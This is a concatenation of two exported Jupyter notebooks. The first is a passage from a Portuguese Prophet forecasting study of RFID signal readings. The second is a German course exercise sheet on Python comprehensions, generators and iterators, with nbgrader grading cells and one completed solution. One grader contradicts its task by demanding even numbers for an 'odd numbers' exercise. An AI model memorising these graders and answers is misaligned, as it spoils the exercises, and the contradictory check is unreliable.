# Para o terceiro teste com modelo de crescimento logístico, valores fixos para cap e floor, de maneira empirica, com base na observação da tendência da distribuição dos valores de y(t).<br>
# Para o dataset criado, mantiveram-se as colunas de VALIDATION, TIMESTAMP, MIN e MAX, sendo que eles foram renomeados para y, ds, floor e cap respectivamente.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="tivBxDykGelp" executionInfo={"status": "ok", "timestamp": 1607192174882, "user_tz": 180, "elapsed": 1038, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="bfa5c066-bb64-452f-bde6-76cd08a5d521"
# Third experiment (fixed empirical bounds): same column selection/renaming
# to Prophet's expected names y, ds, floor, cap.
df_Prophet = df_original.drop(['EPC','MEAN','COUNT'], axis=1)
df_Prophet = df_Prophet.rename(columns={'VALIDATION': 'y','TIMESTAMP':'ds','MIN':'floor','MAX':'cap'})
df_Prophet.head()
# + [markdown] id="dwIDHQmrGelr"
# Como haviam inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="WYRS1ErcGelr" executionInfo={"status": "ok", "timestamp": 1607192178267, "user_tz": 180, "elapsed": 998, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="692f41ab-1a34-4bf0-ea2d-e0a2cab1af0d"
# Reset the index to a contiguous 0..n-1 range.
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0])
df_Prophet
# + [markdown] id="pBIO9AgAGelr"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="KaGcoDLZGelr" executionInfo={"status": "ok", "timestamp": 1607192181689, "user_tz": 180, "elapsed": 1032, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2f0266c5-70e8-4754-cdea-4d6585e58eed"
# Overwrite ds with the synthetic 1 ms time index.
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="luJ41Vj-Gels" executionInfo={"status": "ok", "timestamp": 1607192184359, "user_tz": 180, "elapsed": 1066, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d0fdf0e8-9958-4dc0-efca-d62d1db19c4e"
# Restrict to the observation window [min_period, max_period).
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="xzeKTmhNn-z_"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100.
# + colab={"base_uri": "https://localhost:8080/"} id="JUR7hel5Gels" executionInfo={"status": "ok", "timestamp": 1607192189519, "user_tz": 180, "elapsed": 994, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d300fa41-188a-4ea6-925d-cb7ef5f7e06c"
# 80/20 chronological train/test split, same parameters as the LSTM model.
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="ylOWGZWEoDZz"
# Os valores de -35 e -40 foram adotados como cap e floor de maneira empirica, com base na observação na tendência dos valores de y(t).
# + id="iIyieNCXGels" executionInfo={"status": "ok", "timestamp": 1607192193828, "user_tz": 180, "elapsed": 847, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Fixed empirical saturation bounds chosen by eyeballing the y(t) spread.
df_train['cap'] = -35
df_train['floor'] = -40
# + [markdown] id="ZvJcpFD8oRy2"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="jogm3WmyGelt" executionInfo={"status": "ok", "timestamp": 1607192198127, "user_tz": 180, "elapsed": 674, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b27b7f3c-369c-4dd5-830b-d7b5b349697d"
# Fit the [0, 1] min-max scaler on the training target; reused for test/forecast.
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="mu5B7L7foUnU"
# Para manter-se a proporcionalidade dos valores, os valores de cap e floor foram escalonados com o escalonador treinado com os valores de VALIDATION do dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="PHEb_mKhGelt" executionInfo={"status": "ok", "timestamp": 1607192201930, "user_tz": 180, "elapsed": 1005, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="17fdfa26-fb21-4981-a481-d3c26f64a1bc"
# Scale the fixed cap/floor with the y scaler to keep them proportional.
df_train['cap'] = scaler.transform(df_train[['cap']])
df_train['floor'] = scaler.transform(df_train[['floor']])
df_train.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 470} id="pqX2qVrcGelt" executionInfo={"status": "ok", "timestamp": 1607192247690, "user_tz": 180, "elapsed": 42717, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8e85bdf9-ea9f-49d8-85af-9a605e1fb76e"
# Fit the logistic-growth Prophet model and extend the future frame by
# test_size 1 ms steps; cap/floor must also be present on the future frame.
model = Prophet(growth='logistic')
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
future['cap'] = df_train['cap'].max()
future['floor'] = df_train['floor'].min()
future
# + id="QeNyeysyGelu" executionInfo={"status": "ok", "timestamp": 1607192275308, "user_tz": 180, "elapsed": 23496, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Forecast over the full future frame (training period + test horizon).
forecast = model.predict(future)
# + [markdown] id="f7rYS4cuoZiJ"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuidos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência são o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="TLXo3blGGelu" executionInfo={"status": "ok", "timestamp": 1607192288095, "user_tz": 180, "elapsed": 3146, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="98052e9b-d346-49a5-b3c3-df30d5a1d8ee"
# Forecast plot with changepoints, followed by the component plots.
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + [markdown] id="Qws059sqocoP"
# Para poder se avaliar a métrica da raíz do erro quadrático médio, escalonou-se também o dataset de teste, utilizando o escalonador gerado com o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="Yj1qKB72Gelv" executionInfo={"status": "ok", "timestamp": 1607192298932, "user_tz": 180, "elapsed": 1368, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="acea9bb2-4995-404a-92c3-d8f6dd9be242"
# Scale the test target with the training scaler for a comparable RMSE.
df_test['y'] = scaler.transform(df_test[['y']])
df_test.head()
# + [markdown] id="CcymyUoAogIY"
# Com base nos valores previstos e os valores reais, calculou-se o valor de RMSE (Raíz do Erro Quadrático Médio).
# + colab={"base_uri": "https://localhost:8080/"} id="Ke7YOvvfGelv" executionInfo={"status": "ok", "timestamp": 1607192323051, "user_tz": 180, "elapsed": 846, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c0cbd81a-8e06-4e6d-bac8-da5d82dd2c71"
# RMSE between scaled test values and the last test_size predictions
# (column 1 presumably y; last forecast column presumably yhat — verify).
rmse = sqrt(mean_squared_error(df_test.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + [markdown] id="DzOowscpolGf"
# Por fim, comparou-se a distribuição dos dados dos valores reais e previstos da série.
# + id="vnFwkud9Gelv" executionInfo={"status": "ok", "timestamp": 1607192329634, "user_tz": 180, "elapsed": 799, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Display copies: contiguous indices and inverse scaling for plotting.
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reset index
df_test_show = df_test.copy()
df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # reset index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="cSuFNc6iGelv" executionInfo={"status": "ok", "timestamp": 1607192351154, "user_tz": 180, "elapsed": 1404, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="6ca412b3-131b-417b-e483-5068d106d862"
# Overlay training tail, first 200 test points and the matching predictions.
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="AiQ4JPmTpnb9"
# #### Conclusão Prophet
# + [markdown] id="k5IpfnD-Itbb"
# Ao se observar os resultados obtidos nos quatro cenários apresentados para o Prophet, pode-se observar que todos tiveram uma tendência similar e um valor de raíz do erro quadrático médio próximos.<br>
# O modelo linear apresentou-se bastante vantajoso, devido à sua maneira extremamente fácil de implementar, porém observou-se também que neste caso, houve uma variação muito grande no intervalo de confiança da previsão.<br>
# Dentre todos os cenários apresentados, o que apresentou resultados mais satisfatórios foi o cenário de crescimento logístico utilizando como limite de saturação superior (cap) e de limite de saturação inferior (floor) o máximo valor de RSSI medido dentre as tags e o mínimo valor de RSSI medido dentre as tags. Este cenário, apesar de ter demonstrado um valor de raíz do erro quadrático médio ligeiramente inferior ao do cenário com crescimento linear, apresentou resultado de raíz do erro quadrático médio melhor dentre os três cenários de crescimento logístico e o melhor resultado de intervalo de confiança dos valores previstos dentre todos os cenários avaliados.<br>
# + [markdown] id="MQwoZRxz0WCh"
# # Conclusão
# + [markdown] id="1Cj_iMTyJq79"
# Usar Machine Learning para auxiliar no monitoramento preditivo das leituras das TAGs de RFID em um processo produtivo se demonstrou promissor.
# Em todos os modelos e variações testadas o erro ficou menor que 1 dB de potência, o que ainda garante uma ótima qualidade de validação da TAG no processo produtivo, o que resultaria numa TAG válida.
#
# Com os modelos escolhidos não foi possível ser conclusivo na melhor opção, já que ambos tiveram a mesma performance em relação à métrica de treinamento.
#
# Como próximos passos, os testes com outros modelos seriam uma opção, como por exemplo o ARIMA, também muito famoso e já oferecido comercialmente na empresa que foi fruto desse estudo. Outro meio de explorar ainda mais esse problema é usar outros logs que tenham mais variações em relação aos valores de validação ou um log com mais dados. A dificuldade de consegui-los seria alta dada a confidencialidade da informação.
#
# Por fim, esse estudo serviu para um grande aprofundamento do assunto e prática das matérias de Machine Learning aprendidas e isso não seria possível se não escolhessemos um dataset real de uma empresa privada.
#
# + [markdown] id="b_wnLxwtKK_3"
# # Referências
# + [markdown] id="B2Ktb3U_HhLf"
# https://machinelearningmastery.com/decompose-time-series-data-trend-seasonality/ <br>
# https://machinelearningmastery.com/how-to-develop-lstm-models-for-time-series-forecasting/ <br>
# https://machinelearningmastery.com/arima-for-time-series-forecasting-with-python/ <br>
# https://machinelearningmastery.com/grid-search-arima-hyperparameters-with-python/ <br>
# https://cocoa.ethz.ch/downloads/2015/02/1795_%5BKTF14a%5D%20Classification%20Models%20for%20RFID-based%20Real%20Time%20Detection.pdf <br>
# https://hal.archives-ouvertes.fr/hal-01744328/file/ertek_chi_zhang_2017_RFID.pdf <br>
# https://arxiv.org/ftp/arxiv/papers/1708/1708.03854.pdf <br>
# https://medium.com/swlh/a-quick-example-of-time-series-forecasting-using-long-short-term-memory-lstm-networks-ddc10dc1467d <br>
# https://machinelearningmastery.com/multivariate-time-series-forecasting-lstms-keras/ <br>
# https://www.vooo.pro/insights/guia-completo-para-criar-time-series-com-codigo-em-python/ <br>
# https://medium.com/data-hackers/s%C3%A9ries-temporais-com-machine-learning-parte-2-75e161b7d78e <br>
# http://www.portalaction.com.br/series-temporais/14-testes-de-estacionariedade <br>
# http://colah.github.io/posts/2015-08-Understanding-LSTMs/ <br>
# http://deeplearningbook.com.br/arquitetura-de-redes-neurais-long-short-term-memory/ <br>
# https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ <br>
# https://facebook.github.io/prophet/docs/non-daily_data.html <br>
# https://facebook.github.io/prophet/docs/trend_changepoints.html <br>
# https://machinelearningmastery.com/time-series-forecasting-with-prophet-in-python/ <br>
# https://facebook.github.io/prophet/docs/quick_start.html#python-api <br>
# https://towardsdatascience.com/forecasting-in-python-with-facebook-prophet-29810eb57e66 <br>
# https://facebook.github.io/prophet/docs/trend_changepoints.html <br>
# https://facebook.github.io/prophet/docs/saturating_forecasts.html <br>
# https://rdrr.io/cran/prophet/man/make_future_dataframe.html <br>
# https://cran.r-project.org/web/packages/prophet/prophet.pdf <br>
# https://towardsdatascience.com/implementing-facebook-prophet-efficiently-c241305405a3 <br>
# https://towardsdatascience.com/forecasting-with-python-and-tableau-dd37a218a1e5 <br>
# https://towardsdatascience.com/forecasting-in-python-with-facebook-prophet-29810eb57e66 <br>
# https://github.com/raffg/prophet_forecasting/blob/master/prophet_airpassengers.ipynb <br>
# https://peerj.com/preprints/3190.pdf <br>
# https://medium.com/@christopher.shayan/experimenting-on-facebook-prophet-eb44818278da <br>
# https://facebook.github.io/prophet/docs/diagnostics.html <br>
# https://towardsdatascience.com/demand-forecasting-using-fb-prophet-e3d1444b9dd8<br>
# https://medium.com/analytics-vidhya/how-does-prophet-work-part-2-c47a6ceac511<br>
# https://medium.com/analytics-vidhya/how-does-prophet-work-44addaab6148<br>
# https://medium.com/analytics-vidhya/how-does-prophet-work-part-2-c47a6ceac511<br>
# http://www.producao.ufrgs.br/arquivos/disciplinas/119_teq6_st_decomposicao.pdf<br>
# http://www.stat.yale.edu/~lc436/papers/Harvey_Peters1990.pdf<br>
#
| 1,573,283 |
/u3/iteratoren.ipynb
|
c7d92da66388b2d3bc391f717e644826bc29225b
|
[
"Apache-2.0"
] |
permissive
|
fh-swf-hgi/skriptsprachen
|
https://github.com/fh-swf-hgi/skriptsprachen
| 0 | 2 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 16,326 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <figure>
# <IMG SRC="https://upload.wikimedia.org/wikipedia/commons/thumb/d/d5/Fachhochschule_Südwestfalen_20xx_logo.svg/320px-Fachhochschule_Südwestfalen_20xx_logo.svg.png" WIDTH=250 ALIGN="right">
# </figure>
#
# # Skriptsprachen
# ### Winterersemester 2022/23
# Prof. Dr. Heiner Giefers
# # Generatoren und Iteratoren
# Iteratoren erlauben es, alle Elemente eines Datenverbundes zu "durchlaufen", ohne Genaueres über die Implementierung der Datenstruktur zu kennen. Innerhalb einer Programmschleife angewendet, generiert der Iterator eines Objektes eine Sequenz von Referenzen. Diese Referenzen können auf Objekte zeigen, die vom Iterator selbst erzeugt werden, oder auch auf Elemente, die in Datenstrukturen innerhalb des Objektes existieren.
#
# Dieses Übungsblatt behandelt mehrere Aspekte des _Iterierens_ in Python. Zuerst schauen wir uns die sogenannten **Comprehensions** an, ein Konstrukt um aus iterierbaren Objekten Container Objekte zu generieren, die selbst wieder iterierbar sind. **Generatoren** sind Funktionen, die Sequenzen von Objekten nach einem bestimmten Schema erzeugen. Die viel-benutzte _range()_-Funktion ist ein Beispiel für eine Generatorfunktion. Im letzten Teil des Übungsblattes geht es darum, wie man eigene **Iteratoren** innerhalb von Klassen definieren und anwenden kann.
# ## Comprehensions
# Im Übungsblatt zum Thema _Funktionen_ haben Sie lambda-Funktionen kennengelernt. Ein Beispiel für die Anwendung von lambda Funktionen war die eine _map_ Funktion `mymap`:
def mymap(l, f):
    """Return a new list containing f(e) for every element e of l.

    Kept as an explicit loop on purpose: the notebook contrasts this manual
    map with the list comprehensions introduced right after.
    """
    result = []
    for element in l:
        result.append(f(element))
    return result
# Eine solche Funktion kann benutzt werden, um neue Listen-Objekte aus bestehenden iterierbaren Objekten zu generieren.
# Example: squares of 0..9 via the hand-written map function.
mymap(range(0,10), lambda x: x**2)
# Da Operationen dieser Art recht häufig benötigt werden, besitzt Python eingebaute Konstrukte um neue iterierbare Objekte zu erzeugen. **List-Comprehensions** etwa erzeugen neue Listen-Objekte nach folgendem Muster:
# Equivalent built-in construct: a list comprehension over 0..9.
[x**2 for x in range(0,10)]
satz = ["Mit", "freundlichen", "Grüßen"]
# First letter of each word.
[s[0] for s in satz]
# Die eckigen Klammern deuten an, dass das Ergebnis eine List ist. Innerhalb der Klammern steht ein Iterator-Aufruf, dem vorangestellt ist eine _Zuordnungsvorschrift_ wie Sie sie aus lambda-Funktionen kennen.
# Es ist möglich, die _for_-Schleifen der Iteratoren zu verschachteln. Durch einfaches "Anhängen" einer _for_-Schleife, wird eine innere Schleife erzeugt:
boolean = ['0', '1']
# Nested loops inside one comprehension; the condition restricts x to '0'.
[ "x=%s y=%s z=%s"%(x,y,z) for x in boolean if x!='1' for y in boolean for z in boolean]
# Ferner ist es möglich, das Erzeugen eines neuen Elementes an Bedingungen zu knüpfen. Die Bedingungen werden dabei einfach an die entsprechende Schleife angehängt:
# Conditions can be attached to each loop level independently.
[x*y for x in range(0,10) if x%2==0 for y in range(0,10) if y%2==0 if y>5]
# **Aufgabe 1**
#
# **Benutzen Sie List-Comprehensions um eine Wahrheitstabelle für die XOR-Funktion mit 3 Variablen $x$, $y$ und $z$ zu erzeugen**
# <pre>
# XOR =
# ['x = 0 y = 0 z = 0 xor = 0',
# 'x = 0 y = 0 z = 1 xor = 1',
# .
# .
# .
# .
# .
# 'x = 1 y = 1 z = 1 xor = 1']
# </pre>
# + deletable=false nbgrader={"grade": false, "grade_id": "cell-f602ae40eb54c387", "locked": false, "schema_version": 3, "solution": true, "task": false}
# nbgrader solution cell: build the 3-variable XOR truth table as a list of
# strings using a list comprehension (left unsolved intentionally).
XOR = None
# YOUR CODE HERE
raise NotImplementedError()
XOR
# + deletable=false editable=false nbgrader={"grade": true, "grade_id": "cell-8de2344401e86f75", "locked": true, "points": 1, "schema_version": 3, "solution": false, "task": false}
# Autograder: re-runs the solution cell while capturing stdout to reject
# explicit for-blocks, then verifies each row satisfies x xor y xor z == result.
from io import StringIO
from unittest.mock import patch
from IPython import get_ipython
ipython = get_ipython()
with patch('sys.stdout', new_callable=StringIO) as screen:
    ipython.magic('rerun')
    assert '):' not in screen.getvalue(), 'Use List-Comprehensions, NOT for blocks, to create the XOR list'
# Extract the 0/1 digits from each table row and check the XOR relation.
tru = [[int(x) for x in y if x in '01'] for y in XOR]
for t in tru: assert ((t[0] != t[1]) != t[2]) == t[3], f'{t[0]} xor {t[1]} xor {t[2]} is not {t[3]}!'
# -
# ## Generatoren
# Comprehensions erzeugen iterierbare Objekte aus bestehenden iterierbaren Objekten. Es gibt aber auch Funktionen, die iterierbare Objekte erzeugen; diese Funktionen nennt man Generatoren.
#
# Die Besonderheit bei Generator-Funktionen ist die `yield` Anweisung. `yield` verhält sich ähnlich zu der `return`-Anweisung, mit dem Unterschied, das `yield` zwar Rückgabewerte erzeugt, die Generator-Funktion aber nicht terminiert. Springt der Kontrollfluss erneut zu der Generator-Funktion, wird sie im vorherigen Zustand fortgesetzt.
# +
def gruss():
    """Generator yielding the words of a German closing formula one at a time."""
    for wort in ("Mit", "freundlichen", "Grüßen"):
        yield wort

# Consume the generator: each next() resumes the function at its last yield.
for w in gruss():
    print(w, end=' ')
# +
def zahlen_bis(max):
    """Yield the integers 1, 2, ..., max in ascending order (lazy sequence)."""
    value = 1
    while value <= max:
        yield value
        value += 1

# Print 1..20 by iterating the generator.
for number in zahlen_bis(20):
    print(number, end=' ')
# -
# **Aufgabe 2**
#
# **Entwickeln Sie eine Generator-Funktion, die alle ungeraden Zahlen von `nmin` bis `nmax` mit der Schrittweite `nstep` generiert.**
# + deletable=false nbgrader={"grade": false, "grade_id": "cell-0cc10e66ec3fe468", "locked": false, "schema_version": 3, "solution": true, "task": false}
def ungerade(nmin, nmax, nstep):
    """Generator exercise: produce numbers from nmin to nmax with step nstep
    (task text asks for the odd ones). nbgrader cell, left unsolved."""
    # YOUR CODE HERE
    raise NotImplementedError()

for i in ungerade(4,200,30):
    print(i, end=' ')
# + deletable=false editable=false nbgrader={"grade": true, "grade_id": "cell-5645fba98bcbf8bb", "locked": true, "points": 1, "schema_version": 3, "solution": false, "task": false}
# Autograder for the ungerade exercise.
assert '__iter__' in dir(ungerade(1,101,11)), 'The function is not iterable, make sure you use yield!'
# NOTE(review): the task statement asks for *odd* (ungerade) numbers, but this
# check requires every item to be even (i%2 == 0) — confirm which is intended.
for i in ungerade(1,101,11): assert i%2 == 0, 'All items should be even!'
assert len(list(ungerade(1,101,11))) == 5, 'This set has only 5 elements!'
# -
# ## Iteratoren
# Wir haben Iteratoren bereits mehrfach benutzt, bisher aber noch offen gelassen, wie Iteratoren implementiert werden. Instanzen von eingebauten _Container_ Klassen, wie z.B. Listen, Mengen und Dictionaries, können Iteratoren erzeugen. Sie verwenden dazu eine definierte Schnittstelle, die man auch benutzen kann um Objekte von selbst-entwickelten Klassen iterierbar zu machen.
# Dazu muss die Klasse die beiden _Magic Methods_ `__iter__()` und `__next__()` definieren. `__iter__()` initialisiert den Iterator und gibt eine Referenz auf das eigene Objekt zurück. Das eigentliche Iterieren durch die Sequenz geschieht durch die Methode `__next__()`. Immer, wenn sie aufgerufen wird, liefert sie das aktuelle Objekt der Sequenz zurück und speichert den neuen Zustand so, dass bei einem folgenden Aufruf das nächste Element der Sequenz berechnet werden kann. Welche Objekte zurückgegeben werden und wie die Reihenfolge der Sequenz strukturiert ist, definiert der Programmierer.
# Das Ende eines Iterators wird durch das Erzeugen der `StopIteration`-Ausnahme erreicht. Diese Ausnahme erzeugt keinen Fehler im Interpreter, sondern dient als Abbruchkriterium der for-Schleife, die den Iterator aufruft.
# Durch Implementieren der Iterator-Schnittstelle, kann eine Klasse die Funktionalität erhalten, Datensätze innerhalb der Objekte sinnvoll zu durchlaufen, ohne dass der Benutzer die internen Datenstrukturen der Klasse kennen muss. Die Klasse _FifaWm_ im folgenden Beispiel legt in Ihren Objekten ein Tupel-Attribut _sieger_ an, in dem wiederum 2-Tupel der Form (_Jahr_,_Weltmeister_) abgelegt sind. Möchte man eine Liste der Sieger-Länder von einem Objekt der Klasse erhalten, so muss dem Benutzer der Klasse diese Struktur bekannt sein. Durch Implementieren der `__iter__()` und `__next__()` Methoden wird die Klasse iterierbar.
class FifaWm:
    """Container for FIFA world-cup winners, iterable over the winner names.

    Demonstrates the iterator protocol: ``__iter__`` (re)initialises the
    cursor and ``__next__`` walks the internal (year, winner) tuples,
    yielding only the country name of each entry.
    """

    def __init__(self):
        # Immutable sequence of (year, winner) pairs, in chronological order.
        self.sieger = (
            (1930, "Uruguay"), (1934, "Italien"), (1938, "Italien"), (1950, "Uruguay"),
            (1954, "Deutschland"), (1958, "Brasilien"), (1962, "Brasilien"), (1966, "England"),
            (1970, "Brasilien"), (1974, "Deutschland"), (1978, "Argentinien"), (1982, "Italien"),
            (1986, "Argentinien"), (1990, "Deutschland"), (1994, "Brasilien"), (1998, "Frankreich"),
            (2002, "Brasilien"), (2006, "Italien"), (2010, "Spanien"), (2014, "Deutschland"))

    def __iter__(self):
        # Reset the cursor so the object can be iterated repeatedly.
        self.curr = 0
        return self

    def __next__(self):
        try:
            winner = self.sieger[self.curr][1]
        except IndexError:
            # Sequence exhausted -> signal the end of iteration.
            raise StopIteration from None
        self.curr += 1
        return winner
s = FifaWm()
for land in s: print("%s, " % land, end='')
# Man erkennt in der Implementierung der Iterator-Funktionen, dass ein Iterator keine vollständige Kopie des Objektes erzeugt, sondern nur Zeiger "innerhalb" des Objektes selbst verwaltet. Man sollte daher vermeiden, ein und dasselbe Objekt in verschiedenen Schleifen zu iterieren, wie etwa in folgendem Beispiel:
# NOTE: deliberately broken demo — both loop levels share ONE iterator
# object `s`, so the inner loop exhausts it completely and the outer loop
# terminates after a single pass (see the explanation in the text below).
matches = set()
s = FifaWm()
for land0 in s:
    for land1 in s:
        if land0!=land1:
            matches.add(("%s-%s" % (land0,land1)))
print(matches)
# Hier sollten ursprünglich Paarungen der Sieger-Länder generiert werden; allerdings sieht man, dass das Ergebnis nicht stimmen kann. Das Problem hier ist, dass die innere Schleife den Iterator komplett "konsumiert". D.h., nachdem die Schleife terminiert, ist in dem Objekt die Abbruchbedingung für den Iterator gültig. Es werden daher keine neuen Objekte erzeugt und so terminiert auch die äußere Schleife nach nur einem Schleifendurchlauf.
#
# Besser ist es an dieser Stelle, 2 Iterator-Objekte zu erzeugen und diese jeweils in der inneren, bzw. der äußeren Schleife zu verwenden:
# Correct version: one independent iterator object per loop level, so the
# inner loop can be exhausted (and restarted via __iter__) without
# consuming the iterator driving the outer loop.
matches = set()
s0 = FifaWm()
s1 = FifaWm()
for land0 in s0:
    for land1 in s1:
        if land0!=land1:
            matches.add(("%s-%s" % (land0,land1)))
print(matches)
# **Aufgabe 3**
#
# **Schreiben Sie eine Klasse _Potenzieren_ dessen Konstruktor zwei Parameter besitzt und die entsprechenden Argumente als Attribute `Basis` und `MaxExponent` speichert. Die Klasse soll die Iterator-Schnittstelle in der Form implementieren, dass ein Iterator über die Potenzen der Basis `Basis` von 0 bis `MaxExponent` erzeugt wird**
# + deletable=false nbgrader={"grade": false, "grade_id": "cell-aed2418398231485", "locked": false, "schema_version": 3, "solution": true, "task": false}
class Potenzieren:
    """Iterator over the powers Basis**0 .. Basis**MaxExponent (inclusive).

    Implements the iterator protocol (__iter__/__next__) as required by the
    exercise: iterating an instance yields Basis**0, Basis**1, ...,
    Basis**MaxExponent, i.e. MaxExponent + 1 values in total.
    """

    def __init__(self, Basis, MaxExponent):
        self.Basis = Basis
        self.MaxExponent = MaxExponent

    def __iter__(self):
        # (Re)start iteration at exponent 0 so the object is reusable.
        self.exponent = 0
        return self

    def __next__(self):
        if self.exponent > self.MaxExponent:
            # All MaxExponent + 1 powers emitted -> end of iteration.
            raise StopIteration
        value = self.Basis ** self.exponent
        self.exponent += 1
        return value
# + deletable=false editable=false nbgrader={"grade": true, "grade_id": "cell-84f5c6b11a59201f", "locked": true, "points": 1, "schema_version": 3, "solution": false, "task": false}
assert '__iter__' in dir(Potenzieren(5,10)), 'The function is not iterable, define iter magic method!'
assert '__next__' in dir(Potenzieren(5,10)), 'The function does not have a next magic method!'
assert len(list(Potenzieren(5,10))) == 11, 'This set has only 11 elements!'
for i, p in enumerate(list(Potenzieren(5,10))): assert p == 5**i, f'element number {i} should be {5**i} not {p}'
# -
p = Potenzieren(7,12)
for p in p: print(p)
| 11,157 |
/PY0101EN/PY0101EN-4-2-WriteFile.ipynb
|
